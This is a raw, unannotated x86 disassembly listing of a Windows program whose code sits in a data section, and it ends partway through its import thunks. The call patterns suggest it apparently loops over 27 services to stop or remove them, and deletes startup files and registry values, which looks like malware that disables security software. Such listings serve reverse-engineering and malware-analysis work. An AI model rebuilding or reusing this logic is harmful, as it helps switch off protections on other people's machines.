; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43F08C proc near ; CODE XREF: .data:0043F0CE�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
call sub_43F70D
cmp eax, 80000000h
jb short loc_43F0A3
mov eax, 3Ch
jmp short locret_43F0C4
; ---------------------------------------------------------------------------
loc_43F0A3: ; CODE XREF: sub_43F08C+E�j
push 0
lea eax, [ebp+var_4]
push eax
call sub_43F5F1
and [ebp+var_4], 2
cmp [ebp+var_4], 2
jnz short loc_43F0BF
mov eax, 12Ch
jmp short locret_43F0C4
; ---------------------------------------------------------------------------
loc_43F0BF: ; CODE XREF: sub_43F08C+2A�j
mov eax, 64h
locret_43F0C4: ; CODE XREF: sub_43F08C+15�j
; sub_43F08C+31�j
leave
retn
sub_43F08C endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ecx
push eax
push ebx
push esi
push edi
call sub_43F08C
mov ebx, eax
lea eax, [ebp-4]
push eax
push 0
push 0
push 401565h
push 0
push 0
call sub_43F79D
push eax
call sub_43F6F5
xor esi, esi
jmp short loc_43F127
; ---------------------------------------------------------------------------
loc_43F0F5: ; CODE XREF: .data:0043F129�j
lea eax, [ebp-4]
push eax
push 0
push 0
push 401E23h
push 0
push 0
call sub_43F79D
push eax
call sub_43F6F5
mov eax, 0EA60h
xor edx, edx
div ebx
mov [ebp-8], eax
mov edi, eax
push eax
call sub_43F8BD
pop ecx
inc esi
loc_43F127: ; CODE XREF: .data:0043F0F3�j
cmp esi, ebx
jb short loc_43F0F5
pop edi
pop esi
pop ebx
leave
retn 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43F132 proc near ; CODE XREF: sub_43F401+AC�p
var_388 = dword ptr -388h
var_384 = dword ptr -384h
var_380 = dword ptr -380h
var_37C = dword ptr -37Ch
var_378 = dword ptr -378h
var_374 = dword ptr -374h
var_370 = dword ptr -370h
var_36C = byte ptr -36Ch
var_16C = dword ptr -16Ch
var_168 = byte ptr -168h
var_164 = dword ptr -164h
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = byte ptr -20h
var_1C = dword ptr -1Ch
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 388h
push ebx
push esi
push edi
lea edi, [ebp+var_16C]
lea esi, sub_404A38
mov ecx, 51h
rep movsd
and [ebp+var_24], 0
loc_43F155: ; CODE XREF: sub_43F132+211�j
push 0F003Fh
push 0
push 0
call sub_43F845
mov [ebp+var_28], eax
or eax, eax
jz loc_43F33C
push 0F003Fh
mov eax, 0Ch
mul [ebp+var_24]
mov [ebp+var_370], eax
push [ebp+eax+var_16C]
push [ebp+var_28]
call sub_43F851
mov ebx, eax
or eax, eax
jz loc_43F334
lea eax, [ebp+var_20]
push eax
push 1
push ebx
call sub_43F82D
mov [ebp+var_4], eax
and [ebp+var_4], 0
loc_43F1AD: ; CODE XREF: sub_43F132+A4�j
lea eax, [ebp+var_20]
push eax
push 4
push ebx
call sub_43F82D
or eax, eax
jz short loc_43F1C3
cmp [ebp+var_1C], 1
jnz short loc_43F1C5
loc_43F1C3: ; CODE XREF: sub_43F132+89�j
jmp short loc_43F1D8
; ---------------------------------------------------------------------------
loc_43F1C5: ; CODE XREF: sub_43F132+8F�j
push 3E8h
call sub_43F779
inc [ebp+var_4]
cmp [ebp+var_4], 0Ah
jb short loc_43F1AD
loc_43F1D8: ; CODE XREF: sub_43F132:loc_43F1C3�j
mov eax, 0Ch
mul [ebp+var_24]
mov [ebp+var_374], eax
cmp [ebp+eax+var_168], 0
jz short loc_43F1F6
push ebx
call sub_43F839
loc_43F1F6: ; CODE XREF: sub_43F132+BC�j
push ebx
call sub_43F821
mov eax, 0Ch
mul [ebp+var_24]
mov [ebp+var_378], eax
cmp [ebp+eax+var_164], 0
jz loc_43F334
mov eax, 0Ch
mul [ebp+var_24]
mov [ebp+var_37C], eax
mov eax, [ebp+eax+var_164]
cmp byte ptr [eax], 0
jnz loc_43F2BC
push 0
push 18h
lea eax, [ebp+var_36C]
push eax
push 0
call sub_43F5FD
or eax, eax
jz short loc_43F2BC
lea ecx, [ebp+var_36C]
or eax, 0FFFFFFFFh
loc_43F255: ; CODE XREF: sub_43F132+128�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_43F255
mov [ebp+var_4], eax
cmp [ebp+var_4], 1
jbe short loc_43F289
mov eax, [ebp+var_4]
sub eax, 1
cmp [ebp+eax+var_36C], 5Ch
jz short loc_43F289
push 404BA0h
lea eax, [ebp+var_36C]
push eax
call sub_43F929
add esp, 8
loc_43F289: ; CODE XREF: sub_43F132+131�j
; sub_43F132+141�j
mov eax, 0Ch
mul [ebp+var_24]
mov [ebp+var_380], eax
mov eax, [ebp+eax+var_164]
push dword ptr [eax+8]
lea eax, [ebp+var_36C]
push eax
call sub_43F929
add esp, 8
lea eax, [ebp+var_36C]
push eax
call sub_43F7A9
loc_43F2BC: ; CODE XREF: sub_43F132+FE�j
; sub_43F132+118�j
mov eax, 0Ch
mul [ebp+var_24]
mov [ebp+var_380], eax
mov eax, [ebp+eax+var_164]
cmp byte ptr [eax], 1
jnz short loc_43F334
lea eax, [ebp+var_4]
push eax
push 20006h
push 0
mov eax, 0Ch
mul [ebp+var_24]
mov [ebp+var_384], eax
mov edx, [ebp+eax+var_164]
push dword ptr [edx+4]
mov eax, [ebp+eax+var_164]
push dword ptr [eax+0Ch]
call sub_43F881
or eax, eax
jnz short loc_43F334
mov eax, 0Ch
mul [ebp+var_24]
mov [ebp+var_388], eax
mov eax, [ebp+eax+var_164]
push dword ptr [eax+8]
push [ebp+var_4]
call sub_43F85D
push [ebp+var_4]
call sub_43F875
loc_43F334: ; CODE XREF: sub_43F132+62�j
; sub_43F132+E0�j ...
push [ebp+var_28]
call sub_43F821
loc_43F33C: ; CODE XREF: sub_43F132+36�j
inc [ebp+var_24]
cmp [ebp+var_24], 1Bh
jb loc_43F155
pop edi
pop esi
pop ebx
leave
retn 4
sub_43F132 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 10h
push edi
mov eax, [ebp+0Ch]
cmp eax, 10h
jz short loc_43F3DE
jg short loc_43F36B
cmp eax, 2
jz short loc_43F3D5
jmp loc_43F3EB
; ---------------------------------------------------------------------------
loc_43F36B: ; CODE XREF: .data:0043F35F�j
cmp eax, 113h
jnz short loc_43F3EB
and dword ptr [ebp-4], 0
mov dword ptr [ebp-8], 4
lea eax, [ebp-10h]
push eax
lea eax, [ebp-8]
push eax
lea eax, [ebp-4]
push eax
push 404B81h
push offset sub_404B85
push 80000001h
call sub_43E370
mov eax, dword ptr ds:sub_404098
mov [ebp-0Ch], eax
add [ebp-4], eax
push 4
push 4
lea eax, [ebp-4]
push eax
push 404B81h
push offset sub_404B85
push 80000001h
call sub_43E305
add esp, 30h
push 0
push offset sub_404098
call sub_43F725
jmp short loc_43F3FC
; ---------------------------------------------------------------------------
loc_43F3D5: ; CODE XREF: .data:0043F364�j
push 0
call sub_43F7F1
jmp short loc_43F3FC
; ---------------------------------------------------------------------------
loc_43F3DE: ; CODE XREF: .data:0043F35D�j
push dword ptr ds:loc_402FFE+2
call sub_43F809
jmp short loc_43F3FC
; ---------------------------------------------------------------------------
loc_43F3EB: ; CODE XREF: .data:0043F366�j
; .data:0043F370�j
push dword ptr [ebp+14h]
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
call sub_43F815
loc_43F3FC: ; CODE XREF: .data:0043F3D3�j
; .data:0043F3DC�j ...
pop edi
leave
retn 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43F401 proc near ; CODE XREF: sub_43F609+5C�p
var_2DC = byte ptr -2DCh
var_2D8 = byte ptr -2D8h
var_148 = dword ptr -148h
var_143 = byte ptr -143h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
arg_0 = dword ptr 8
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 2DCh
push edi
mov edi, [ebp+arg_0]
push [ebp+arg_8]
push 403010h
call sub_43F68D
push 404B7Ch
lea eax, [ebp+var_143]
push eax
call sub_43F911
and [ebp+var_44], 0
lea eax, loc_4023A4+3
mov [ebp+var_40], eax
and [ebp+var_3C], 0
and [ebp+var_38], 0
mov [ebp+var_34], edi
and [ebp+var_30], 0
and [ebp+var_2C], 0
and [ebp+var_28], 0
and [ebp+var_24], 0
lea eax, [ebp+var_143]
mov [ebp+var_20], eax
lea eax, [ebp+var_44]
push eax
call sub_43F7C1
push 0
push edi
push 0
push 0
push 0
push 0
push 0
push 0
push 0CF0000h
push offset sub_404D25
lea eax, [ebp+var_143]
push eax
push 0
call sub_43F7FD
mov dword ptr ds:loc_402FFE+2, eax
call sub_43F6D1
push eax
call sub_43E2E0
lea eax, [ebp+var_2D8]
push eax
push 2
call sub_43F53D
push 0
call sub_43F132
lea eax, [ebp+var_2DC]
push eax
push 0
push 0
push 40211Dh
push 0
push 0
call sub_43F79D
push eax
call sub_43F6F5
and [ebp+var_148], 0
push 4
push 4
lea eax, [ebp+var_148]
push eax
push 404B81h
push offset sub_404B85
push 80000001h
call sub_43E305
add esp, 24h
push 0
push 2710h
push 1
push dword ptr ds:loc_402FFE+2
call sub_43F7B5
jmp short loc_43F522
; ---------------------------------------------------------------------------
loc_43F510: ; CODE XREF: sub_43F401+132�j
lea eax, [ebp+var_1C]
push eax
call sub_43F7D9
lea eax, [ebp+var_1C]
push eax
call sub_43F7E5
loc_43F522: ; CODE XREF: sub_43F401+10D�j
push 0
push 0
push 0
lea eax, [ebp+var_1C]
push eax
call sub_43F7CD
or eax, eax
jnz short loc_43F510
pop edi
leave
retn 10h
sub_43F401 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 4
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43F53D proc near ; CODE XREF: sub_43F401+A5�p
jmp dword ptr ds:loc_40524A+2
sub_43F53D endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43F549 proc near ; CODE XREF: .data:0043E607�p
jmp dword ptr ds:loc_405250
sub_43F549 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43F555 proc near ; CODE XREF: .data:0043E5D4�p
jmp dword ptr ds:sub_405254
sub_43F555 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43F561 proc near ; CODE XREF: .data:0043E502�p
; sub_43E731+651�p
jmp dword ptr ds:loc_405257+1
sub_43F561 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43F56D proc near ; CODE XREF: sub_43E731+1BA�p
jmp dword ptr ds:loc_40525C
sub_43F56D endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43F579 proc near ; CODE XREF: sub_43ED92+20�p
jmp dword ptr ds:loc_40525F+1
sub_43F579 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43F585 proc near ; CODE XREF: sub_43ED92+E�p
jmp dword ptr ds:loc_40525F+5
sub_43F585 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43F591 proc near ; CODE XREF: .data:0043E5C2�p
; sub_43E731+197�p
jmp dword ptr ds:loc_405267+1
sub_43F591 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43F59D proc near ; CODE XREF: .data:0043EFCF�p
; .data:0043F060�p
jmp dword ptr ds:loc_40526A+2
sub_43F59D endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43F5A9 proc near ; CODE XREF: sub_43E731+63�p
; .data:0043EFE6�p
jmp dword ptr ds:loc_40526F+1
sub_43F5A9 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43F5B5 proc near ; CODE XREF: .data:0043E5F2�p
jmp dword ptr ds:loc_40526F+5
sub_43F5B5 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43F5C1 proc near ; CODE XREF: .data:0043E3E2�p
; sub_43E731+20B�p ...
jmp dword ptr ds:loc_405277+1
sub_43F5C1 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43F5CD proc near ; CODE XREF: .data:0043E434�p
; .data:0043E470�p ...
jmp dword ptr ds:loc_40527C
sub_43F5CD endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43F5D9 proc near ; CODE XREF: .data:0043E4FA�p
; sub_43E731+649�p
jmp dword ptr ds:loc_40527F+1
sub_43F5D9 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43F5E5 proc near ; CODE XREF: .data:0043E58B�p
; sub_43E731+48�p
jmp dword ptr ds:loc_405283+1
sub_43F5E5 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43F5F1 proc near ; CODE XREF: sub_43F08C+1D�p
jmp dword ptr ds:loc_40528A+6
sub_43F5F1 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43F5FD proc near ; CODE XREF: sub_43F132+111�p
jmp dword ptr ds:loc_40529C
sub_43F5FD endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43F609 proc near ; CODE XREF: .data:0043E228�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push edi
call sub_43F6C5
mov edi, eax
cmp byte ptr [edi], 22h
jnz short loc_43F63D
push 22h
mov eax, edi
inc eax
push eax
call sub_43F935
add esp, 8
mov [ebp+var_4], eax
or eax, eax
jz short loc_43F658
mov edi, eax
inc edi
jmp short loc_43F635
; ---------------------------------------------------------------------------
loc_43F634: ; CODE XREF: sub_43F609+2F�j
inc edi
loc_43F635: ; CODE XREF: sub_43F609+29�j
cmp byte ptr [edi], 20h
jz short loc_43F634
jmp short loc_43F658
; ---------------------------------------------------------------------------
loc_43F63C: ; CODE XREF: sub_43F609+3E�j
inc edi
loc_43F63D: ; CODE XREF: sub_43F609+F�j
movsx eax, byte ptr [edi]
or eax, eax
jz short loc_43F649
cmp eax, 20h
jnz short loc_43F63C
loc_43F649: ; CODE XREF: sub_43F609+39�j
jmp short loc_43F64C
; ---------------------------------------------------------------------------
loc_43F64B: ; CODE XREF: sub_43F609+4D�j
inc edi
loc_43F64C: ; CODE XREF: sub_43F609:loc_43F649�j
movsx eax, byte ptr [edi]
or eax, eax
jz short loc_43F658
cmp eax, 20h
jz short loc_43F64B
loc_43F658: ; CODE XREF: sub_43F609+24�j
; sub_43F609+31�j ...
push 0
call sub_43F6E9
push 1
push edi
push 0
push eax
call sub_43F401
pop edi
leave
retn
sub_43F609 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_43F66D proc near ; CODE XREF: sub_43E731+8�p
var_FFC = dword ptr -0FFCh
pop ecx
loc_43F66E: ; CODE XREF: sub_43F66D+14�j
sub esp, 1000h
sub eax, 1000h
test [esp+0FFCh+var_FFC], eax
cmp eax, 1000h
jnb short loc_43F66E
sub esp, eax
test [esp+0FFCh+var_FFC], eax
jmp ecx
sub_43F66D endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 4
db 0
; =============== S U B R O U T I N E =======================================
sub_43F68D proc near ; CODE XREF: sub_43F401+15�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov edx, [esp+arg_4]
xor eax, eax
mov ecx, 0FFFFFFFFh
xchg edi, edx
repne scasb
neg ecx
lea ecx, [ecx-1]
mov eax, [esp+arg_4]
xchg eax, esi
mov edi, [esp+arg_0]
rep movsb
xchg eax, esi
xchg edx, edi
mov eax, [esp+arg_0]
retn 8
sub_43F68D endp
; ---------------------------------------------------------------------------
align 4
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43F6B9 proc near ; CODE XREF: .data:0043E548�p
jmp dword ptr ds:loc_4052A5+3
sub_43F6B9 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43F6C5 proc near ; CODE XREF: sub_43F609+5�p
jmp dword ptr ds:loc_4052AC
sub_43F6C5 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43F6D1 proc near ; CODE XREF: sub_43F401+91�p
jmp dword ptr ds:loc_4052AC+4
sub_43F6D1 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43F6DD proc near ; CODE XREF: .data:0043E550�p
jmp dword ptr ds:loc_4052B4
sub_43F6DD endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43F6E9 proc near ; CODE XREF: sub_43F609+51�p
jmp dword ptr ds:loc_4052B4+4
sub_43F6E9 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43F6F5 proc near ; CODE XREF: .data:0043E580�p
; .data:0043E624�p ...
jmp dword ptr ds:loc_4052BC
sub_43F6F5 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43F701 proc near ; CODE XREF: .data:0043EDD8�p
jmp dword ptr ds:loc_4052C0
sub_43F701 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43F70D proc near ; CODE XREF: sub_43F08C+4�p
jmp dword ptr ds:loc_4052C0+4
sub_43F70D endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43F719 proc near ; CODE XREF: sub_43E2E0+1E�p
jmp dword ptr ds:loc_4052C5+3
sub_43F719 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43F725 proc near ; CODE XREF: .data:0043E51E�p
; .data:0043F3CE�p
jmp dword ptr ds:loc_4052CB+1
sub_43F725 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43F731 proc near ; CODE XREF: .data:0043E4C2�p
jmp dword ptr ds:loc_4052CB+5
sub_43F731 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43F73D proc near ; CODE XREF: .data:0043E55D�p
; .data:0043EDF0�p
jmp dword ptr ds:loc_4052CB+9
sub_43F73D endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43F749 proc near ; CODE XREF: .data:0043E53A�p
jmp dword ptr ds:loc_4052D7+1
sub_43F749 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43F755 proc near ; CODE XREF: .data:0043E57A�p
jmp dword ptr ds:loc_4052D7+5
sub_43F755 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43F761 proc near ; CODE XREF: sub_43E023+13�p
jmp dword ptr ds:loc_4052DE+2
sub_43F761 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43F76D proc near ; CODE XREF: .data:0043E598�p
; sub_43E731+17E�p
jmp dword ptr ds:loc_4052DE+6
sub_43F76D endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43F779 proc near ; CODE XREF: .data:0043E4B6�p
; .data:0043E4F0�p ...
jmp dword ptr ds:loc_4052E5+3
sub_43F779 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43F785 proc near ; CODE XREF: sub_43E731+72�p
jmp dword ptr ds:loc_4052EC
sub_43F785 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43F791 proc near ; CODE XREF: sub_43E731+BB�p
; sub_43E731+D9�p ...
jmp dword ptr ds:loc_4052F0
sub_43F791 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43F79D proc near ; CODE XREF: .data:0043E61E�p
; .data:0043F0E6�p ...
jmp dword ptr ds:loc_4052F2+2
sub_43F79D endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43F7A9 proc near ; CODE XREF: sub_43F132+185�p
jmp dword ptr ds:loc_4052F7+1
sub_43F7A9 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43F7B5 proc near ; CODE XREF: sub_43F401+108�p
jmp dword ptr ds:loc_405303+1
sub_43F7B5 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43F7C1 proc near ; CODE XREF: sub_43F401+60�p
jmp dword ptr ds:loc_405307+1
sub_43F7C1 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43F7CD proc near ; CODE XREF: sub_43F401+12B�p
jmp dword ptr ds:loc_40530B+1
sub_43F7CD endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43F7D9 proc near ; CODE XREF: sub_43F401+113�p
jmp dword ptr ds:loc_405310
sub_43F7D9 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43F7E5 proc near ; CODE XREF: sub_43F401+11C�p
jmp dword ptr ds:loc_405312+2
sub_43F7E5 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43F7F1 proc near ; CODE XREF: .data:0043F3D7�p
jmp dword ptr ds:loc_405317+1
sub_43F7F1 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43F7FD proc near ; CODE XREF: sub_43F401+87�p
jmp dword ptr ds:loc_40531B+1
sub_43F7FD endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43F809 proc near ; CODE XREF: .data:0043F3E4�p
jmp dword ptr ds:loc_40531D+3
sub_43F809 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43F815 proc near ; CODE XREF: .data:0043F3F7�p
jmp dword ptr ds:loc_405322+2
sub_43F815 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43F821 proc near ; CODE XREF: sub_43F132+C5�p
; sub_43F132+205�p
jmp dword ptr ds:loc_40532F+1
sub_43F821 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43F82D proc near ; CODE XREF: sub_43F132+6F�p
; sub_43F132+82�p
jmp dword ptr ds:loc_405333+1
sub_43F82D endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43F839 proc near ; CODE XREF: sub_43F132+BF�p
jmp dword ptr ds:loc_405335+3
sub_43F839 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43F845 proc near ; CODE XREF: sub_43F132+2C�p
jmp dword ptr ds:loc_40533A+2
sub_43F845 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43F851 proc near ; CODE XREF: sub_43F132+59�p
jmp dword ptr ds:loc_40533F+1
sub_43F851 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43F85D proc near ; CODE XREF: sub_43F132+1F5�p
jmp dword ptr ds:loc_405344
sub_43F85D endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43F869 proc near ; CODE XREF: sub_43E305+21�p
jmp dword ptr ds:loc_405348
sub_43F869 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43F875 proc near ; CODE XREF: sub_43E305+4B�p
; sub_43E370+40�p ...
jmp dword ptr ds:loc_40534C
sub_43F875 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43F881 proc near ; CODE XREF: sub_43E370+16�p
; sub_43F132+1D1�p
jmp dword ptr ds:loc_40534D+3
sub_43F881 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43F88D proc near ; CODE XREF: sub_43E370+36�p
jmp dword ptr ds:loc_405352+2
sub_43F88D endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43F899 proc near ; CODE XREF: sub_43E305+41�p
jmp dword ptr ds:loc_405357+1
sub_43F899 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43F8A5 proc near ; CODE XREF: sub_43E245+15�p
jmp dword ptr ds:loc_405363+1
sub_43F8A5 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43F8B1 proc near ; CODE XREF: .data:0043E20B�p
jmp dword ptr ds:loc_405366+2
sub_43F8B1 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43F8BD proc near ; CODE XREF: .data:0043EE1A�p
; .data:0043EE54�p ...
jmp dword ptr ds:loc_40536A+2
sub_43F8BD endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43F8C9 proc near ; CODE XREF: .data:0043E236�p
jmp dword ptr ds:loc_40536F+1
sub_43F8C9 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43F8D5 proc near ; CODE XREF: sub_43E731+B2�p
; sub_43E731+D0�p ...
jmp dword ptr ds:loc_405374
sub_43F8D5 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43F8E1 proc near ; CODE XREF: sub_43E731+16D�p
; sub_43E731+2E4�p ...
jmp dword ptr ds:loc_405374+4
sub_43F8E1 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43F8ED proc near ; CODE XREF: .data:0043E18C�p
jmp dword ptr ds:loc_40537B+1
sub_43F8ED endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43F8F9 proc near ; CODE XREF: sub_43E630:loc_43E659�p
; sub_43E630:loc_43E6B3�p ...
jmp dword ptr ds:loc_405380
sub_43F8F9 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43F905 proc near ; CODE XREF: .data:0043E145�p
; .data:0043E15F�p ...
jmp dword ptr ds:loc_405381+3
sub_43F905 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43F911 proc near ; CODE XREF: .data:0043E44B�p
; sub_43E630+F4�p ...
jmp dword ptr ds:loc_405386+2
sub_43F911 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
